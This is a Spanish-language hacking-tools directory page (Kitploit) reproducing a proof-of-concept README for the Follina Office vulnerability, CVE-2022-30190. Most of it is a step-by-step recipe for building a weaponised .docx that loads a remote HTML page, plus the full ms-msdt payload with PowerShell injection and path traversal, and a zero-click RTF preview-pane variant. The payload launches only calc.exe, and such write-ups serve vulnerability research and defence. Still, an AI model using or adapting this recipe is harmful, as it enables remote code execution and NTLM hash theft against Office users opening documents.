Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/wysiiwyg/poc-cve-2022-30190
Análisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubwysiiwyg/poc-cve-2022-30190

PoC-CVE-2022-30190

Exploit de prueba de concepto para CVE-2022-30190 (Follina), que demuestra la ejecución remota de código mediante documentos de Microsoft Office manipulados que utilizan el manejador de URI ms-msdt.

Ver Repositorio
122hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC CVE-2022-30190 : CVE 0-day MS Office RCE, también conocido como msdt follina

Info : Nueva vulnerabilidad de día cero en Microsoft Office utilizada en ataques para ejecutar PowerShell

Resumen

El 29 de mayo de 2022, el equipo Nao_Sec, un equipo independiente de investigación en ciberseguridad, descubrió un documento malicioso de Office compartido en Virustotal. Este documento utiliza un esquema inusual, aunque conocido, para infectar a sus víctimas. El esquema no fue detectado como malicioso por algunos EDR, como Microsoft Defender for Endpoint. Esta vulnerabilidad podría permitir la ejecución de código sin necesidad de interacción del usuario, ya que no involucra macros, excepto si el modo Protected View está habilitado. Aún no se le ha asignado un número CVE.

Detalles Técnicos

La vulnerabilidad se explota mediante el esquema de URI de MSProtocol para cargar código. Los atacantes podrían incrustar enlaces maliciosos dentro de documentos, plantillas o correos electrónicos de Microsoft Office que comiencen con ms-msdt: y que se cargarían y ejecutarían posteriormente sin interacción del usuario, excepto si el modo Protected View está habilitado. No obstante, convertir el documento al formato RTF también podría omitir la función Protected View.

Prueba de Concepto

Los archivos .docx de MS Office pueden contener referencias externas a objetos OLE como archivos HTML. Existe un esquema HTML "ms-msdt:" que invoca la herramienta de diagnóstico msdt, la cual es capaz de ejecutar código arbitrario (especificado en los parámetros).

El resultado es un aterrador vector de ataque para lograr RCE con solo abrir archivos .docx maliciosos (sin usar macros).

Estos son los pasos para construir un documento .docx de Prueba de Concepto:

  1. Abra Word (se usó Word 2019 Pro actualizado, 16.0.10386.20017), cree un documento ficticio, inserte un objeto (OLE) (como Bitmap Image), y guárdelo como .docx.

  2. Edite word/_rels/document.xml.rels dentro de la estructura del .docx (es un zip simple). Modifique la etiqueta XML <Relationship> con el atributo

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

y Target="embeddings/oleObject1.bin" cambiando el valor de Target y agregando el atributo TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Tome nota del valor de Id (probablemente sea "rId5").

  1. Edite word/document.xml. Busque la etiqueta <o:OLEObject ..> (con r:id="rId5") y cambie el atributo de Type="Embed" a Type="Link" y agregue el atributo UpdateMode="OnCall".

NOTA: El docx malicioso creado es casi el mismo que el de CVE-2021-44444.

  1. Sirva el payload HTML del PoC (lanzador de calc.exe) con el esquema ms-msdt en http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Tenga en cuenta que:

  • La línea de comentario con AAA debe repetirse más de 60 veces (mínimo 4096 bytes).
  • Se requerían al menos dos recorridos de directorio /../ al inicio del parámetro IT_BrowseForFile.
  • El código envuelto dentro de $() se ejecutaría a través de PowerShell, pero los espacios lo romperían.
  • .exe debe ser la última cadena final presente al final del parámetro IT_BrowseForFile.

Adicionalmente, el payload desencadenante puede conectarse a ubicaciones remotas. Si bien es poco probable que invoque un binario no confiable, la conexión igualmente transportará hashes NTLM (lo que significa que los actores malintencionados ahora tienen un hash de la contraseña de Windows de la víctima) que un adversario podría usar para una mayor post-explotación.

BONUS (versión RTF de 0 clics)

Si además agrega estos elementos dentro del elemento <o:OLEObject> en word/document.xml en el paso 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

entonces también funcionará como RTF (abra el docx resultante y guárdelo como RTF).

Con RTF, no es necesario abrir el archivo en Word; basta con navegar hasta el archivo y echarle un vistazo en el panel de vista previa. El panel de vista previa activa el payload HTML externo y el RCE se produce sin ningún clic.

Fuentes :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (código original)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (información adicional)
Descargar herramienta